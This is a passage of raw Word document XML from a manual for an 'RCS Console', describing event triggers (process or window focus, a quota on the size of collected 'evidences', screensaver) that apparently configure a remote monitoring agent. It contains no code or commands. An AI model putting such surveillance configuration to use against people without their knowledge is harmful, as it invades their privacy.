                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00104CC3">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00104CC3" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00104CC3">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00104CC3" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00104CC3">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00104CC3" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="00A52C9B" w:rsidRDefault="00104CC3" w:rsidP="00104CC3">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(Process)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00104CC3" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00104CC3" w:rsidRPr="00E64C3B" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="00E64C3B" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="00E64C3B" w:rsidRDefault="00104CC3" w:rsidP="00F6467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104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="00E64C3B" w:rsidRDefault="00104CC3" w:rsidP="00F64671">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104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="00E64C3B" w:rsidRDefault="00104CC3" w:rsidP="00F64671">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(1) </w:t>
            </w:r>
            <w:r w:rsidRPr="00E64C3B">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="0029138B" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="red"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] (2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) is the type of process identification (name or window title).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E8321E" w:rsidRPr="0029750F" w:rsidRDefault="00E8321E" w:rsidP="00E8321E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRDefault="00E8321E" w:rsidP="00E8321E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>String</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the process name or window title (wildcards allowed).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E8321E" w:rsidRPr="0029750F" w:rsidRDefault="00E8321E" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="00E64C3B" w:rsidRDefault="00104CC3" w:rsidP="00DB04C5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00E8321E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>On Focus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00DB04C5">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if selected, the Event triggers the Action only when the process or window are in foreground.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00104CC3" w:rsidRDefault="00104CC3" w:rsidP="00104CC3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00446D19" w:rsidRDefault="00446D19" w:rsidP="00446D19">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabell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104CC3" w:rsidTr="00F64671">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00104CC3" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRDefault="0010013A" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.8</w:t>
            </w:r>
            <w:r w:rsidR="00104CC3">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00104CC3" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00104CC3">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00104CC3" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00104CC3">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00104CC3" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00104CC3">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00104CC3" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="00A52C9B" w:rsidRDefault="00104CC3" w:rsidP="00F6467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(Quota)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1508" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:203.25pt;z-index:251881472;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId103" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1508" DrawAspect="Content" ObjectID="_1446455354" r:id="rId104"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00104CC3" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify if the Event is active or not. If an Event is not enabled no connected Actions will be called.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Event’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">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allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRPr="0029750F" w:rsidRDefault="00104CC3" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Quota</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the maximum size of the evidences that must be reached before the Quota Event is triggered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00104CC3" w:rsidRDefault="00104CC3" w:rsidP="00104CC3">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00104CC3" w:rsidRDefault="00104CC3">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>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446D19" w:rsidTr="0029750F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029750F" w:rsidRDefault="0029750F" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRDefault="0010013A" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.9</w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00446D19" w:rsidRPr="00A52C9B" w:rsidRDefault="0029750F" w:rsidP="0029750F">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(Screensaver)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1094" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:160.5pt;z-index:251732992;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId105" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1094" DrawAspect="Content" ObjectID="_1446455355" r:id="rId106"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00446D19" w:rsidRDefault="00446D19" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="00446D19" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="00446D19" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="00446D19" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify if the Event is active or not. If an Event is not enabled no connected Actions will be called.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="00446D19" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Event’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="00446D19" w:rsidP="00446D19">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allows you to specify which type o</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>f Event you’re about to create.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00446D19" w:rsidRDefault="00446D19" w:rsidP="00446D19">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="00785BC7" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>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284"/>
        <w:gridCol w:w="5355"/>
      </w:tblGrid>
      <w:tr w:rsidR="00446D19" w:rsidTr="0029750F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00446D19" w:rsidRDefault="003A4380" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
